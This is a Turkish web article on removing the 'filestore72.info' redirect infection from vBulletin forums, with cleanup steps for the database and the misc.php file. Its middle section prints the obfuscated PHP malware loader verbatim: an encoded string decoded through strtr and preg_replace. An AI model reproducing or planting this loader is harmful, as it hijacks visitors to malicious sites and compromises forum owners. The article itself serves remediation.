Ana sayfa internet Bilgileri Web Araçları Vbulletin filestore72.info Yönlendirme Sorunu ve Çözümü

Vbulletin filestore72.info Yönlendirme Sorunu ve Çözümü

88
0
PAYLAŞ

Son zamanlarda vbulletin forum sistemi kullanan webmasterlar filestore virüsü ise karşı karşıya kaldı. Virüs oldukça sinsi ve malesef ki çoğu webmaster bu virüsü farkedemiyor.

Virüsü tespit edebileceğiniz en etkili yok hitinizin düşmesi ve arama motorlarından gelen ziyaretçilerin çok fazla azalmasıdır. Virüsün çalışma mantığıda şöyle: Google gibi arama motorundan bir arama yaparak sitenize tıklayan bir kişi sitenize ulaşamıyor, siteniz yerine filestore72.info adresi açılıyor. Yani siteniz filestore72.info adresine yönlendirilmiş oluyor. Bu yönlendirme her kişi için sadece günde 1 kez çalışıyor. Diğer tıklamalarda sitenize normal erişim sağlanıyor.

Hitimizin büyük çoğunluğunu arama motoru ziyaretçileri olduğunu düşünürsek ilk tıklamada sitenize ulaşamayan ziyaretçiler bir daha sitenize girmek için tıklamayacaktır.

Öncelikle virüsün kaynağını anlamamız gerekiyor. Sitenizde aşağıdaki eklentileri kullanıyorsanız virüs bu eklentiler vasıtası ile sitenize giriyor.

VSA Chat,
VSA Advanced Statistics,
Ajax Advanced Statistics,
vBSEO,
vBSEO Sitemap Generator

Virüs kendi kodlarını veritabanına ekliyor ve bulmanız oldukça zorlaşıyor. Ayrıca virüs kodlarını silsenizde 1 gün sonra zararlı kodlar tekrar ekleniyor. Zararlı kodlar aşağıdaki gibidir.

$pt = 'b5cea96e92fbff3ba46cca57268ae447'; 
$arrvb = '30m%D2zm93h[,V3kRV3D&gt;/e=&gt;K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j&lt;3Bq&amp;E.VjmgX?zC)_gKJBkl=BkBk9T.jf&gt;/eR&gt;K&amp;0+8=%k]&gt;0k]T]#bL&lt;*|8&lt;+Or&lt;k|X%V.4jg8~Nw8qz&gt;/~6g7j&lt;+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&amp;TB4jg8~Nw8qz&gt;/~6g7j%+8=Q;gqvm.4]1K&gt;0V/&amp;AkC%j+g&gt;x;|&gt;rVK&amp;xkK&amp;8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ&gt;^}wV)n%}]g7jf&gt;/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7&gt;86&lt;*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&amp;B;"8OzCJBg._BVg&amp;O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C&gt;&lt;V)?oz/jvm7k9&gt;/}&lt;^/?jVb6=&gt;|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw&gt;86f&gt;/L=}eXNn6Q&gt;qJ=}wjJC7J4f&gt;Ce=})q17JX^w6X77J~wNn6=&gt;K8&lt;kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j&gt;A9j3n8Lz|&gt;jEe+&gt;neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef&gt;/R=+"8?V/jR&gt;)=nqJ&gt;"qJ&gt;z&gt;6rwJ)~^")=Xn8R]g7jf&gt;CR=&gt;A&amp;A;|&gt;&lt;k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko&gt;/+OV"&amp;9+gq&lt;zO6:kr!D[|Z:z|~6m"=ok89];l&gt;8kl?]g7[]#K8&lt;kKTokCr?N|;=&gt;B[jVl&gt;8zC&amp;%VC%o#n_0k/q&lt;zK_A"BVAm"8?zCJK+g&gt;Am"=o&gt;86o&gt;B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR&gt;)=bn6=#7wJz&gt;C_VE7%fm";R&gt;Cel&gt;l%AkKJ6E.q^q6Jw"BVK&gt;86&lt;&gt;O;RmgXA+g}R&gt;)=/qJqz&gt;K<a>86&lt;E7;lE.)%zg~6374jg6XNn6Q&gt;qJ9j;86&lt;E7%fm";R&gt;/}=N7qREgQ&lt;+O4j3O%A+gqvzK=!m"wR&gt;C[9&gt;KJo&gt;B&amp;6m"8%E.j!TA;?TbL&lt;*BqQNgX8;]X6kOrQ+bwR&gt;C4&lt;#bL9*.jfk/&gt;&lt;z]}R1lq0;|JQ+"_6#l&amp;0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|&gt;%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr&lt;VbQ=m";RE.ejV7jl&gt;OqBEgQ&lt;+O4j37%f&gt;eVTn6&gt;~n)Xz&gt;|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&amp;8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&amp;A+g9jq6&amp;N}j)Tw89]k|q_zCw]gJ9];|XA&gt;86oN7qI*|8=^}ZZ`'; $ajx = ':eMx(UPoYL}O`I5&amp;@|=XQ^sp4~1Tt*./+2&gt;9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_&lt;'; 
$ajx2 = '.E[8/~?u#AQi;q-x|39Ntf&amp;&lt;gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T&gt;0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p'; 
$baseline = '%s%'.substr($arrvb, 733, 1); 
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');

Bu kodları öncelikle veritabanınızdan (phpmyadmin) bularak silmeniz gerekiyor. Kodlar veritabanınızda Datastore tablosu içindeki pulinglist içindedir. Bu kodlar varsa (Yaklaşık 5700 lü sıralarda bir boşluk civarında oluyor) bu kodları silin. Burayı sildikten sonra bir veya iki eklentiniz işlevsizlik gösterebilir. Şayet öle bişey olursa plugini Tekrar Yükleyin. Tüm işlemlerden önce yedek almanızı tavsiye ediyoruz.

Bu zararlı kodu sildikten sonra sorununuz geçici olarak çözülmüş oluyor. Fakat 1 gün sonra kodları yeniden eklendiğinde tekrar silmeniz gerekir. virüsün tekrar eklenmesini engellemek için yukarıda ismini verdiğimiz ürünleri bulun.

Bu ürünleri kullanmayın veya bunların eklentileri(pluginleri)nden “misc_start”, “Postbit_display_start” ve “Postbit_display_complete”i pasifleştirin.

Forumun bulunduğu dizindeki misc.php dosyasında;

<php
satırının altına şu kodu ekleyip kaydedin:

if($_GET['g']=='js') die;

Bu işlemleri yaptığınızda zararlı kodlar bir daha eklenmeyecektir. Ayrıca sitenizi zararlı yazılımlara karşı taramak için Rescan Adresini kullanabilirsiniz.

BİR CEVAP BIRAK